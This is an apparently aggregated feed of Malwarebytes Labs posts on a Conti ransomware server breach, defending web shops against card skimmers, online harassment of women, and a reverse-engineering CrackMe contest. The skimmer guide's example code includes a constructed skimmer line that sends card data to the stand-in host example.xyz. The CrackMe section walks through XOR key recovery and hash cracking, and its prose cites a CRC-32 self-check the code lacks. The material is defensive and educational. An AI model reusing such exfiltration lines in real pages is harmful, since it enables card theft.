IT News


Security researchers play peek-a-boo with Conti ransomware server

It’s not been a great time for ransomware authors recently. Well, some ransomware authors at any rate. While many are making huge amounts of money from their device-locking antics, it’s not a profession without risk. Every so often something can and does go wrong, and ransomware groups get into all manner of trouble. Sometimes they aim too high and generate a huge amount of heat. At that point, the solution is to go into hiding or claim to be leaving the business forever.

Elsewhere, it can be a case of accidentally leaking the decryption key, or making it so that third parties can figure it out.

Sometimes, an incident is just a disaster from start to finish.

Setting the scene

Conti ransomware is perhaps most well known for its use in the HSE healthcare attacks back in May. More than 80,000 endpoints were shut down and the health service had to revert to the pen and paper approach. Providers in the US and New Zealand were also affected.

Conti is created and distributed by “Wizard Spider”, a group which also created the well-known Ryuk ransomware. Conti, offered to affiliates as Ransomware as a Service, ran wild in the first quarter of 2021. RDP brute forcing, phishing, and hardware / software vulnerabilities are the chosen methods for Conti compromise.

Where it gets interesting is that Conti directs victims to Dark Web “support portals” where they talk through the steps to unlocking impacted devices. This is where the current Conti issues have arisen.

A lack of support

Security firm Prodaft discovered a vulnerability in the servers Conti uses for recovery. Essentially, the place they tell victims to go. They discovered the real IP address of the hidden service and were able to monitor network traffic for connections to the server. This is particularly ironic considering the slightly confusing stance on free keys, which still come with a ransom attached. There was also a flurry of news recently when word dropped that they were selling access to victims.

All in all, having access to a support portal swiped is probably not high on the Conti gang’s list of “cool things to have happen”.

Down for the count?

Once word broke that a security firm had accessed the server for more than a month, the people behind the ransomware scrambled to fix things. What this meant in practice was a support portal missing in action, and no way for victims to pay.

In total, the Conti infrastructure here was mostly offline for something like two days. This sounds great in theory. However, while the ransomware edifice was temporarily toppled, the individuals and organisations affected couldn’t communicate with the attackers. If they decided to pay, they couldn’t. If they wanted to appeal to the attackers’ better nature, that wasn’t possible either.

To add to this sense of uncertainty, the victims would have no way of knowing if the people responsible for their locked files would even come back. They could have simply cut their losses.

Not a great time to be compromised by ransomware, and that’s taking into account that there’s never a great time to be compromised by ransomware.

An increasingly creaky comeback?

Conti has now, of course, returned with a combative air of defiance:

This isn’t the first thing to go wrong for them recently, however. In August, an ex-pentester for Conti decided to spill several gallons worth of beans on Conti activities. This individual, unhappy with the money they were making, dumped files allegedly handed to affiliates on a forum. Rival factions go to war with one another all the time, but it’s still somewhat unusual to see insider documents posted quite like this.

Still, despite the wheels coming off, it doesn’t seem to stop ransomware groups for long. There’s simply too much money at stake and (probable) decent odds against getting caught by law enforcement. In the game of ransomware whack-a-mole, the mole is most definitely king.

The post Security researchers play peek-a-boo with Conti ransomware server appeared first on Malwarebytes Labs.

How to defend your website against card skimmers

Black Friday and the holiday season are approaching, and shoppers are forecast to spend record amounts again this year. Retail websites big and small can expect a lot of interest from shoppers looking for deals, and a lot of interest from cybercriminals looking to cash in on those shoppers, by stealing their credit card details with stealthy card skimmers.

Card skimmers, or web skimmers, are pieces of malicious software that criminals piggyback on to legitimate websites, so they can steal shoppers’ credit card details. The skimmers read the details as users type them into the sites’ payment forms, or replace the payment forms with convincing fakes. Attackers have even been seen adding entire checkout pages to sites that don’t take payments. Skimmers can steal card details in real time, as they are typed, even before the victim clicks “submit” on the payment form.

Skimmers allow criminal hackers to silently rob every customer that makes a purchase on an infected website, until they are discovered and removed. Malwarebytes products detect card skimmers, and our Threat Intelligence team tracks and investigates them. We know that card skimming activity tends to increase in line with busy shopping days, and shop owners need to be extra-vigilant heading into the holiday season.

A payment form created by a card skimmer and a real payment form side by side. Can you spot the fake? The answer is at the end of the article*.

In this article we will explain the basic steps you should take to secure your website against card skimmers. Getting these basics right will also protect your website against a range of other cyberthreats too.

But before we look at how to secure your site, let’s look at why you should, if you’re only running a small mom-and-pop shop.

Why you aren’t too small to get hacked

If you think your website is too small to be of interest to cybercriminals, think again. They don’t care how small your site is. Really. In fact, they don’t care about you at all and may never even look at your website.

Cybercriminals don’t break into websites one by one, using their best guess to figure out your password like they do in the movies. They use computer programs to scan the Internet for vulnerable websites. There are millions of vulnerable websites out there, and scanning the entire Internet to find them is fast, cheap, and easy.

When they find a site they can break into, they inject a card skimmer, automatically.

Their objective is to break into thousands of websites at a time and the process is automated and can run continuously. It effectively costs criminals nothing to break into even the smallest website, so every website—no matter how small—is an attractive target.

Websites without a payment form can still be targeted, or monetised in other ways, so even if your site doesn’t sell anything, it is still at risk.

Securing your website

With an Internet full of potential targets to choose from, you don’t have to do much to make your website less attractive to attackers. As the old saying goes, you don’t have to outrun the bear that’s chasing you, you just have to outrun the other people running away from the bear!

So, how do you move a little faster than the others?

Step 0, keep your computer secure

The first step in keeping your website secure is to make sure that your computer, and the computers belonging to anyone else who administers the site, are secure. If your computer has malware on it, it doesn’t matter how secure your website is, because criminals can simply steal your password, or log in to your website from your computer, pretending to be you.

Keep your software up to date with security fixes, and install a modern antivirus solution, a password manager, and a security plugin for your browser, like BrowserGuard.

Set strong passwords. Never share them, never reuse them

One of the easiest ways to break into a website is to guess an administrator password for the software that runs the website—its Content Management System (CMS). If an attacker can do that, they can do anything they like to the website, including adding a card skimmer and dismantling any defences you have.

Just as they don’t search for websites manually, attackers don’t guess passwords manually either. They have computer programs for that too. And once their scanner finds your website, another computer program will happily plug away 24/7, trying to guess your password. They will move on eventually, but they may have made thousands of attempts before they do.

The good news is that you can seriously sharpen up your password game by avoiding a few bad habits:

  • Bad passwords. Cybercrooks don’t guess passwords randomly, they use lists of popular passwords. The ten thousand most common passwords are full of easy-to-type sequences like 123456, 1111, and qwertyuiop, or they are made from names and common words like monkey, michael or trustno1. If your password is on that list, or looks like the passwords on that list, your website is in trouble.
  • Shared passwords. If you share a password with somebody you have no idea if they are storing it securely, or who they might be sharing it with. The only way to ensure passwords stay secret is to never share them. Give everyone their own account, with their own password, and tell them not to share.
  • Passwords you’ve used elsewhere. Alongside common passwords, criminals also use lists of usernames and passwords exposed in data breaches (this is called credential stuffing). Chances are you’ve lost at least one password in a data breach. If you never use the same password twice, you can’t be caught by credential stuffing.
  • Everyone’s an admin. It’s often convenient to give everyone who works on a site an administrator account, so their work isn’t interrupted by being denied access to something. But every separate administrator login gives criminals another potential way in. Save administrator-level access for the people that need it, and aim for the smallest number of administrators you can get away with.

You can get to grips with most of these bad habits by adding two-factor authentication (2FA) to your site. 2FA forces users to provide another piece of information with their password when they log in, such as a one-time code from an app. Any decent website CMS will have a 2FA option built in, or 2FA plugins that are easy to find and install.

If your company uses a Virtual Private Network (VPN) to provide secure, remote access to company systems, you could limit access to your website login screen to company VPN users too.

Keep website software up to date, every day

Another easy way to break into a website is by exploiting a software vulnerability in the web server, CMS, or plugins your website uses. A vulnerability is a coding flaw that lets attackers do things they aren’t supposed to be able to do, such as adding files to your website, or accessing its back end without logging in. When software vendors find vulnerabilities in their software they provide a security patch that fixes the problem.

Your website is only secure against that problem when you apply the patch.

Criminals often reverse engineer patches to find out what vulnerabilities they fix, and then attempt to use those vulnerabilities to break into websites that haven’t been patched yet. They can do this extremely quickly.

In 2014, Drupal, a very popular CMS, released an update for a serious security flaw. Criminals reverse engineered the update and were using it to take over websites within hours. Later, the Drupal security team made the extraordinary announcement that if you hadn’t updated your website within seven hours of the patch being released then you should “consider it likely your site was already compromised”.

Make sure you know whose job it is to keep the website patched. This may be something that the people who built and maintain your website will do for you, or a job you need to do yourself. Whatever you do, don’t just assume that somebody else must be doing it.

If you use WordPress, it should update itself automatically with security fixes. You can check this by logging in and going to Dashboard > Updates. Note however that, by default, WordPress does not update plugins automatically (recent versions let you switch on auto-updates per plugin from the Plugins screen, which is worth doing). Vulnerabilities in plugins are common, and probably the biggest threat to your website, so if nothing else, you will need to make a point of logging in regularly to check for and apply plugin updates.

The same is true for other CMSes: You should log in regularly to see if there are updates that need to be applied. We suggest you also go to your CMS vendor’s website (and any plugin vendor’s sites too) and see if they have a mailing list where they announce patches. Sign yourself up so you are alerted if anything urgent needs your attention.

Finally, this advice applies to every website under your control. It is quite common for companies to run a number of websites on the same server. These could be different websites for different purposes, or test and staging versions of your principal site. If any one of those websites is compromised, it gives attackers a potential route to cross-contaminate all the other sites on the server. Test and staging sites are often neglected, and often exposed to the Internet accidentally, making them a particularly soft underbelly.

Use a Web Application Firewall (WAF)

A Web Application Firewall (WAF) is an appliance or Cloud-based service that filters the data that’s sent to your website, weeding out things that look malicious, such as XSS or SQLi attacks. They can also prevent unauthorized data (like credit card details from a server-side skimmer) from leaving your website if it is compromised.

WAFs use a rulebook to recognize malicious or unauthorized inputs and outputs, which means they can often provide protection far sooner than patching. All a WAF vendor needs to know to create a new rule is what input the attackers are using to compromise websites. To create a patch, a vendor needs to know what input the attackers are using, but also how that input affects their software, and how to fix it without breaking anything.

WAFs add complexity to your environment and may require regular updates, but they provide a useful extra layer of defence for your website. You should never use a WAF as an alternative to patching, but using one could save you if you miss a patch, are too slow to apply one, or if attackers are using a zero-day technique that your CMS or plugin vendor hasn’t patched yet.

Protecting users from rogue dependencies

Web pages are typically made up of multiple separate elements, such as scripts, images, Like buttons, sharing widgets, and so on, drawn from multiple different places. In fact it is not uncommon for individual pages to have tens or even hundreds of such dependencies, and for them to be drawn from many different domains: analytics and advertising code from Google perhaps, a Tweet button from Twitter, images pulled from a Content Delivery Network (CDN), and so on.

The different elements are only assembled into a single page at the last minute when it’s viewed in a web browser, and that process is repeated in each user’s machine, each time the page is viewed.

Each dependency is a potential backdoor into your web pages. If an attacker can compromise a site hosting one of your dependencies, they can use it to inject a card skimmer into your page when it is assembled by a web browser, without ever compromising your website. You can’t control the passwords or patching on the sites you depend on, so instead you must take steps to protect your users from compromised dependencies.

Subresource integrity

Subresource integrity is a form of tamper protection for scripts and stylesheets. If an attacker compromises a third-party script your website relies on, they can use it to inject a card skimmer into your pages.

In June 2019, Malwarebytes Threat Intelligence discovered exactly this kind of attack on the official Washington Wizards page of the NBA.com website. Attackers had managed to alter a script the site used that was hosted on an Amazon S3 storage website.

Subresource integrity protects against this kind of attack by using fingerprints (cryptographic hashes) to verify that elements loaded by <script> or <link> tags haven’t been altered.

For example, let’s say your website uses version 3.6 of the popular jQuery JavaScript library. Without Subresource Integrity, the script tag for it would look like this:

<script src="https://code.jquery.com/jquery-3.6.0.js"></script>

With Subresource Integrity, the script tag looks like this:

<script src="https://code.jquery.com/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous"></script>

When a browser assembles your page it will download the jQuery code and create its own cryptographic fingerprint from it, and match it against the fingerprint in the tag. If the fingerprints don’t match, the browser will assume the jQuery code has been compromised and won’t run it.
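To make the mechanism concrete, here is an added example (written for this article, not code from the original post or from any browser) that generates the integrity value for a resource and then performs the same check a browser does. The two script bodies are constructed stand-ins for a real library file and a tampered copy of it; the CDN URL is made up.

```python
"""Added example: generating and checking Subresource Integrity values.

Illustrative code written for this article, not part of the original post
and not a browser's implementation. ORIGINAL_SCRIPT and TAMPERED_SCRIPT are
constructed stand-ins for a real library file and an attacker-modified copy.
"""
import base64
import hashlib
import hmac

# Constructed sample: what a CDN might serve for a small helper library.
ORIGINAL_SCRIPT = b"window.q = function (sel) { return document.querySelector(sel); };\n"
# Constructed sample: the same file after an attacker appends a skimmer stub.
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + b"fetch('https://example.xyz/c?d=' + document.forms[0].cc.value);\n"

# Algorithms the SRI spec recognises; anything else is ignored by browsers.
SUPPORTED = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
STRENGTH = {"sha256": 0, "sha384": 1, "sha512": 2}


def sri_value(body: bytes, algo: str = "sha384") -> str:
    """Build the integrity attribute value, e.g. 'sha384-<base64 digest>', for a resource body."""
    digest = SUPPORTED[algo](body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def parse_integrity(attr: str) -> list:
    """Parse a (possibly multi-token) integrity attribute into (algo, digest) pairs.
    Tokens using an unknown algorithm are dropped, as the spec requires."""
    parsed = []
    for token in attr.split():
        algo, _, b64 = token.partition("-")
        if algo in SUPPORTED:
            parsed.append((algo, base64.b64decode(b64)))
    return parsed


def integrity_ok(body: bytes, attr: str) -> bool:
    """Browser-style check: keep only the strongest algorithm present, then
    accept the resource if any digest for that algorithm matches the body."""
    parsed = parse_integrity(attr)
    if not parsed:
        return True  # no usable metadata: per spec, nothing is enforced
    strongest = max(STRENGTH[algo] for algo, _ in parsed)
    for algo, expected in parsed:
        if STRENGTH[algo] == strongest and hmac.compare_digest(SUPPORTED[algo](body).digest(), expected):
            return True
    return False


def script_tag(src: str, body: bytes) -> str:
    """Emit the tag you would paste into the page for a resource whose body you have verified."""
    return f'<script src="{src}" integrity="{sri_value(body)}" crossorigin="anonymous"></script>'


if __name__ == "__main__":
    print(script_tag("https://cdn.example.net/q.js", ORIGINAL_SCRIPT))  # assumed URL
    attr = sri_value(ORIGINAL_SCRIPT)
    print("original passes:", integrity_ok(ORIGINAL_SCRIPT, attr))
    print("tampered passes:", integrity_ok(TAMPERED_SCRIPT, attr))
```

Two details worth noticing: the hash must be computed over the exact bytes the CDN serves (a whitespace-only change breaks it, which is the point), and when several tokens are listed the browser only trusts the strongest algorithm present, so a stale sha256 token cannot be used to downgrade a sha512 one.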

Content Security Policy

Sometimes, instead of changing an existing dependency, attackers can find enough leverage to add a new dependency to your site, from a website they control.

Content Security Policy (CSP) is a simple addition to your website that can protect against this form of attack. It works by sending web browsers a list of the domain names your website trusts, and what it trusts them to do.

For example, let’s say your website is example.com, and your website includes Google Analytics code, which is loaded from the analytics.google.com domain. Your CSP header would say you trust your own site to provide all forms of content, and that you trust Google Analytics, in addition to your own site, to provide scripts, and nothing else. Note that a directive such as script-src does not inherit from default-src: when it is present it replaces the default entirely for that type of content, so 'self' has to be repeated in script-src or your own scripts will be blocked. The actual instruction looks like this:

Content-Security-Policy: default-src 'self'; script-src 'self' analytics.google.com

If a cybercriminal sneaks a card skimming script on to your site that’s loaded from example.xyz, web browsers will refuse to run the card skimmer. So, even though your website has been compromised, it will not affect your users.

CSP isn’t perfect. In a serious hack, an attacker might gain enough access to your site to remove the CSP instructions altogether, but in many situations they won’t.
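The fallback rule is the part people get wrong most often, so here is an added example (written for this article, not a browser’s CSP engine and not code from the original post) that evaluates a policy the way a browser resolves directives: a type-specific directive such as script-src, if present, replaces default-src for that type, so a policy that lists only analytics.google.com under script-src blocks the site’s own scripts. The policies, page origin and URLs are constructed for the demo, and the evaluator handles only 'self', 'none', host names, scheme-prefixed hosts and a leading "*." wildcard.

```python
"""Added example: a minimal Content-Security-Policy source-list evaluator.

Illustrative code written for this article; it is not a browser's CSP
engine and not code from the original post. It understands 'self', 'none',
bare host names, scheme-prefixed hosts and a leading "*." label, which is
enough to show how directive fallback works. Policies and URLs below are
constructed for the demo.
"""
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Fetch directives fall back to default-src only when they are absent;
# a present script-src replaces default-src for scripts entirely.
FALLBACK = {
    "script-src": "default-src",
    "style-src": "default-src",
    "img-src": "default-src",
    "connect-src": "default-src",
    "default-src": None,
}


def parse_policy(header: str) -> Dict[str, List[str]]:
    """Split "a b; c d" into {"a": ["b"], "c": ["d"]} (directive names are case-insensitive)."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def host_matches(pattern: str, host: str) -> bool:
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])  # *.example.com covers a.example.com, not example.com
    return pattern == host


def source_allowed(expr: str, url: str, page_origin: str) -> bool:
    """Does one source expression permit fetching url from a page at page_origin?"""
    target, page = urlsplit(url), urlsplit(page_origin)
    if expr == "'none'":
        return False
    if expr == "'self'":
        return (target.scheme, target.netloc) == (page.scheme, page.netloc)
    if expr.startswith("'"):
        return False  # nonces, hashes, 'unsafe-inline': about inline code, not URLs
    if "://" in expr:
        scheme, host = expr.split("://", 1)
        if scheme.lower() != target.scheme:
            return False
    else:
        host = expr
    return host_matches(host.lower(), (target.hostname or "").lower())


def governing_directive(policy: Dict[str, List[str]], directive: str) -> Optional[str]:
    """Walk the fallback chain until a directive that is actually in the policy is found."""
    d: Optional[str] = directive
    while d is not None and d not in policy:
        d = FALLBACK.get(d)
    return d


def allowed(header: str, directive: str, url: str, page_origin: str) -> bool:
    policy = parse_policy(header)
    d = governing_directive(policy, directive)
    if d is None:
        return True  # nothing governs this fetch, so CSP does not restrict it
    return any(source_allowed(e, url, page_origin) for e in policy[d])


PAGE = "https://example.com"  # assumed page origin
# The mistake: script-src without 'self' silently blocks first-party scripts.
BROKEN = "default-src 'self'; script-src analytics.google.com"
FIXED = "default-src 'self'; script-src 'self' analytics.google.com"

CASES = [  # constructed loads a checkout page might attempt
    ("script-src", "https://example.com/js/checkout.js"),
    ("script-src", "https://analytics.google.com/analytics.js"),
    ("script-src", "https://example.xyz/skimmer.js"),
    ("img-src", "https://example.com/img/logo.png"),
]


def evaluate(header: str) -> Dict[str, bool]:
    return {url: allowed(header, d, url, PAGE) for d, url in CASES}


if __name__ == "__main__":
    for name, header in (("BROKEN", BROKEN), ("FIXED", FIXED)):
        print(name, header)
        for url, ok in evaluate(header).items():
            print("  ", "allow" if ok else "BLOCK", url)
```

Run it and the BROKEN policy blocks /js/checkout.js while still allowing the logo (img-src falls back to default-src because no img-src is present); the FIXED policy allows first-party scripts and the analytics host and still blocks the skimmer on example.xyz.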

You can see if your website already has a CSP header (and other useful security headers too) by checking it on securityheaders.com.

Pulling it all together

Securing your site and its dependencies against attack is vitally important, but sometimes you don’t realise you’re vulnerable until it’s too late, or your Subresource Integrity and CSP silently block a rogue dependency and you never learn about it (unless you use CSP’s report-uri or report-to directive, which asks browsers to send you a report whenever the policy blocks something).

In both cases you want something that tells you as soon as the problem starts. So the last step in securing your site is to use a third-party integrity monitoring service that sees your site from your users’ point of view. These services can find card skimmers that slip through the net and, most importantly, tell you that there’s something you need to fix.

Automated integrity checking services are like users that work on your behalf, periodically visiting important web pages, like your checkout, pulling in all the dependencies in real time, looking for anything that shouldn’t be there, and alerting you if they find anything.

Although we have gone into a lot of depth in this article, keeping websites secure is mostly a matter of setting up a few services, and then doing some simple things, over and over again. By making these things a habit, you will strengthen your site enormously against card skimmers and other attacks, and keep your users safe through the holiday season and beyond.

* The fake checkout is on the left.

The post How to defend your website against card skimmers appeared first on Malwarebytes Labs.

The Internet is not safe enough for women, and Sue Krautbauer has some ideas about why: Lock and Code S02E22

Decades ago, the promise of the Internet was clear: No one, depending on their age, gender, race, income, or place of birth, would be unwelcome from expressing their thoughts and ideas.

Today, that promise has been largely unfulfilled. As Malwarebytes discovered earlier this year, the Internet is a deeply unequal place for women, teenagers, and Black communities, Indigenous populations, and people of color. Women, above all demographics, told us that they felt both the least safe and the least private online, and when we looked at why that might be, the answers were obvious. Women face higher rates of cyberstalking. Women are almost singularly targeted by nonconsensual pornography. Women who are stuck in situations of domestic abuse are also reportedly more frequently impacted by the threats of stalkerware. Women also, as we learned, reported higher rates of receiving text messages from unknown phone numbers, and having their social media accounts hacked.

These are all the outcomes of an unfair Internet. On today’s Lock and Code podcast, with host David Ruiz, we dig into why so many real-life problems have followed women onto the Internet today.

Part of the problem, according to our guest Sue Krautbauer, is that the Internet has created tremendous latitude for bad actors to commit harms and then get away without a trace.

“It almost feels a bit like online guerilla warfare, right? Where they come in, and they lob something into the internet, and then they disappear again. And that can just have such an emotional and a mental toll on the victims because they can’t point to them and say it’s that person or that thing.”

Sue Krautbauer, senior director of strategy and development for Digitunity

Today, on the Lock and Code podcast, we speak with Sue Krautbauer, senior director of strategy and development for Digitunity, about the different—often worse—experiences that women face online, how pervasive such treatment can be, and why our Internet so often mirrors our real-life situations.


You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post The Internet is not safe enough for women, and Sue Krautbauer has some ideas about why: Lock and Code S02E22 appeared first on Malwarebytes Labs.

Malwarebytes CrackMe – contest summary

On October 29 we published our third CrackMe Challenge and announced two parallel tracks for the contest: “The fastest solve” and “The best write-up”.

In the first category (“The fastest solve”), we already had three winners in the first weekend following publication. Big congratulations to:

🥇 @nazywam

🥈 Suvaditya Sur (@x0r19x91)

🥉 @evandrix

Yet, even those of you who are not as fast could still join in the fun, and get a chance to win a prize in the second category. Submissions for the best writeup closed November 12 (two weeks after the Crackme publication). In this post we will summarize the writeups that we received, and announce the winner for the best writeup!

Hall of fame

The submissions were treated as valid if they contained the following flag:

flag{you_got_this_best_of_luck_in_reversing_and_beware_of_red_herrings}

We received them in the following order:

  1. 🥇 @nazywam
  2. 🥈 Suvaditya Sur (@x0r19x91)
  3. 🥉 @evandrix
  4. 🎊 Alex Skalozub (@pieceofsummer)
  5. 🎊 @JLeow00
  6. 🎊 rainbowpigeon
  7. 🎊 arm4nd0
  8. 🎊 Matthieu Walter (@matth_walter)
  9. 🎊 Bahlai Vladyslav (@BaglaiVlad) & Alex Shevchuk
  10. 🎊 @kasua02
  11. 🎊 @zvikam

Congratulations to all the solvers!

CrackMe 3 challenge

Before we present you with the writeups, let’s have a quick look at the task itself.

The CrackMe was composed of multiple components:

  • The GUI application (written in .NET): responsible for taking the input and verifying it, or passing it on to the further layers. It accepted three passwords for the consecutive levels.
  • The server: a packed native application, responsible for verifying the passwords for stages 2 and 3. It communicates with the GUI application via a named pipe and a local TCP server.
  • The DLL injector (written in .NET, loaded into the main application with the help of .NET Reflection).
  • The hooking DLL: a native DLL, injected into the server, hooking some of the APIs it uses and changing the password verification function.

It is worth noting that each level of the CrackMe depends on the previous one, so the passwords have to be provided in the right order.

To make the analysis easier, and more approachable for beginners, the code (apart from the loader part) was not obfuscated. Some components were based on public code, or contained debug strings making it easier to follow.

Level 1:

In the first level, the user was supposed to input the password that would let the second stage be properly decoded and run as a new process. The second stage of the crackme was a PE, steganographically hidden in the image displayed in the GUI and obfuscated by XOR with a static key. Because a PE header contains predictable bytes, the key could be recovered with a known-plaintext attack.
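For readers who have not done a known-plaintext attack on repeating-key XOR before, here is an added example (written for this summary; it is not the crackme’s own code and the hidden PE is a constructed minimal header, not the real stage-2 binary). It assumes the payload is a standard MSVC-style PE whose DOS stub carries the usual “This program cannot be run in DOS mode” text at offset 0x4E, which is what makes the plaintext known, and that the key is no longer than that text. The key R3dH3rr1ng! is made up for the demo.

```python
"""Added example: recovering a repeating XOR key from a PE by known-plaintext attack.

Illustrative code written for this summary, not the crackme's own code.
The 'hidden' PE is a constructed minimal header. It assumes the payload is
an MSVC-style PE carrying the standard DOS stub text at offset 0x4E, and
that the XOR key is no longer than that text (43 bytes).
"""
import struct
from typing import Optional

DOS_STUB_TEXT = b"This program cannot be run in DOS mode.\r\r\n$"
DOS_STUB_OFFSET = 0x4E  # where MSVC-linked PEs place that string
KEY = b"R3dH3rr1ng!"     # constructed key, treated as unknown to the analyst


def build_sample_pe() -> bytes:
    """Constructed minimal PE-like image: DOS header, DOS stub, and a PE signature."""
    hdr = bytearray(b"MZ" + b"\x90" * 0x3A)               # 0x00..0x3B
    hdr += struct.pack("<I", 0x80)                         # e_lfanew at 0x3C
    hdr += bytes.fromhex("0E1FBA0E00B409CD21B8014CCD21")  # DOS stub code, 0x40..0x4D
    hdr += DOS_STUB_TEXT                                   # 0x4E..0x78
    hdr += b"\x00" * (0x80 - len(hdr))
    hdr += b"PE\x00\x00" + bytes(range(256)) * 2            # signature plus filler
    return bytes(hdr)


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(cipher: bytes, known: bytes, offset: int, max_len: int = 64) -> Optional[bytes]:
    """Known-plaintext attack on repeating-key XOR.

    XORing the ciphertext with the known plaintext yields a window of the key
    stream: stream[i] == key[(offset + i) % n]. The smallest period n that the
    window is consistent with is the key length; the window is then rotated
    back so that the returned bytes start at key position 0.
    """
    stream = xor(cipher[offset:offset + len(known)], known)
    for n in range(1, min(max_len, len(stream)) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return bytes(stream[(j - offset) % n] for j in range(n))
    return None


def looks_like_pe(data: bytes) -> bool:
    """Sanity check on the decrypted result: MZ header and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_payload(cipher: bytes) -> Optional[bytes]:
    """Full pipeline: recover the key from the DOS stub, decrypt, validate."""
    key = recover_key(cipher, DOS_STUB_TEXT, DOS_STUB_OFFSET)
    if key is None:
        return None
    plain = xor(cipher, key)
    return plain if looks_like_pe(plain) else None


if __name__ == "__main__":
    blob = xor(build_sample_pe(), KEY)  # what you would carve out of the image
    print("recovered key:", recover_key(blob, DOS_STUB_TEXT, DOS_STUB_OFFSET))
    print("valid PE after decrypt:", extract_payload(blob) is not None)
```

The validation step matters in practice: a period check can be fooled by a short or repetitive known fragment, so confirming the MZ/PE signatures after decryption is what tells you the recovered key is right rather than merely consistent with the 43 bytes you looked at.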

Level 2:

The second password entered by the user was sent over the pipe to the previously deployed server. The user was supposed to unpack the core of the server and analyze it. First, it was necessary to notice that the presence of certain analysis tools causes the crackme to exit. Then, the user needed to work out that the expected password is in fact the name of one of those analysis tools. The final step was finding a public list of such tools and cracking the password by a dictionary attack.

The correct password not only cleared the level, but also triggered the decryption of the hooking DLL that was injected into the server.
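The dictionary attack in Level 2 works because the binary only stores hashes of the tool names it looks for, and a hash table built from a public list of analysis tools inverts them instantly. Here is an added example of that step (written for this summary, not the crackme’s own code). It assumes the check hashes lowercased process names with CRC-32; that algorithm is an assumption, chosen because its 0xEDB88320 table constant is easy to recognise in a disassembly. The target hashes and the candidate list are constructed for the demo.

```python
"""Added example: cracking a hashed process-name check by dictionary attack.

Illustrative code written for this summary, not the crackme's own code.
It assumes the binary compares CRC-32 hashes of lowercased process names
(an assumption; CRC-32 is easy to identify in a disassembly by the
0xEDB88320 constant). TARGET_HASHES and CANDIDATES are constructed.
"""
from typing import Dict, List, Optional

CRC_POLY = 0xEDB88320  # reflected CRC-32 polynomial; seeing this constant identifies the algorithm


def crc32(data: bytes) -> int:
    """Bitwise CRC-32 (IEEE 802.3), written the way it usually appears in hand-rolled hashing code."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ CRC_POLY if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def name_hash(name: str) -> int:
    """Hash the way an anti-analysis check typically does: case-folded, so x64dbg.exe == X64DBG.EXE."""
    return crc32(name.lower().encode("ascii"))


# Constructed stand-in for a public list of analysis tools (Al-Khaser style).
CANDIDATES: List[str] = [
    "ollydbg.exe", "x64dbg.exe", "x32dbg.exe", "ida64.exe", "procmon.exe",
    "wireshark.exe", "pestudio.exe", "processhacker.exe", "fiddler.exe", "windbg.exe",
]

# Constructed: hash values as they would be lifted from the binary's table.
# The last one matches nothing in the list, to show what a miss looks like.
TARGET_HASHES: List[int] = [name_hash("x64dbg.exe"), name_hash("pestudio.exe"), 0xDEADBEEF]


def crack(targets: List[int], dictionary: List[str]) -> Dict[int, Optional[str]]:
    """Hash the whole dictionary once, then look every target up in constant time."""
    table = {name_hash(n): n for n in dictionary}
    return {h: table.get(h) for h in targets}


if __name__ == "__main__":
    for h, name in crack(TARGET_HASHES, CANDIDATES).items():
        print(f"{h:08x} -> {name or '(not in dictionary)'}")
```

The self-check on the standard CRC-32 test vector (the string 123456789 hashes to 0xCBF43926) is the quickest way to confirm that the routine you lifted from the binary really is plain CRC-32 and not a customised variant; if that vector fails, the constants or the init/final XOR have been changed and the dictionary must be rebuilt with the variant.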

Level 3:

The third password inserted by the user was sent over the local TCP connection to the previously deployed server.

The user was supposed to notice that the hooking DLL alters the behavior of the verification function. With this information, the actual flow of the verification function should be reconstructed. Then it was possible to crack the final password.

Techniques covered:

  1. Steganography
  2. Packed executable (loader with self-injection of the payload)
  3. Shellcodified PE
  4. Loading functions by hashes (API hashing)
  5. Basic anti-analysis tricks
  6. Vectored Exception Handling (VEH)
  7. Inline hooking
  8. Inter-process communication
  9. .NET Reflection
  10. Classic DLL injection

List of writeups

We received 6 writeups in total, from the following contestants:

Scoring the writeups

As we mentioned in the contest opening:

The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide the explanation of the techniques used in the challenge

Just like in the previous edition, in order to introduce some objective measures, several categories were used to assign points.

  • The quality of the solution:

There are no wrong solutions if they lead to the goal. However, some approaches are faster and more elegant than others. We ranked higher the solutions that are straight to the point and not over-engineered. If multiple solutions were presented in a single writeup, we appreciated if the author stated which of them is the most optimal, and why.

  • An in-depth explanation of the inner workings of the CrackMe, guiding through the process of solving. This means writers should have:
  1. Explained how to approach the CrackMe: presented an overview of the task as a whole
  2. Explained each stage of the CrackMe: the main logic, relationship to the other levels
  3. Identified and described each executable layer the stage was composed of (loaders, shellcodes, etc.)
  4. Identified each algorithm used (e.g. CRC32, RC4)
  5. Identified and explained each technique used (from the list “techniques covered”)
  6. Explained the third verification function before and after hooking, presented what each hook is responsible for, and how it changes the logic

An educational value of the writeup. Writers should have:

  1. Introduced tools before they were used, showing the environment setup
  2. Provided detailed explanation of the used techniques, reaching beyond the CrackMe itself. For example, providing links where the reader can learn more.
  3. Described the solution in a comprehensive way, that can be followed by a beginner
  4. If applicable, presented different approaches, and explanation which of them is the recommended one and why
  5. Provided graphical illustrations making the provided explanation easier to follow. Diagrams, GIFs, videos, etc.
  6. Been especially clear and had a pleasant writing style

You could also get some bonus points for OSINT if you found:

  1. The header of the payload in the stage 2 was shellcodified with the help of pe_to_shellcode
  2. The hashes in the stage 2 were based on the list from the Al-Khasher project
  3. The function checking the processes was copied from the repo: antianalysis_demos
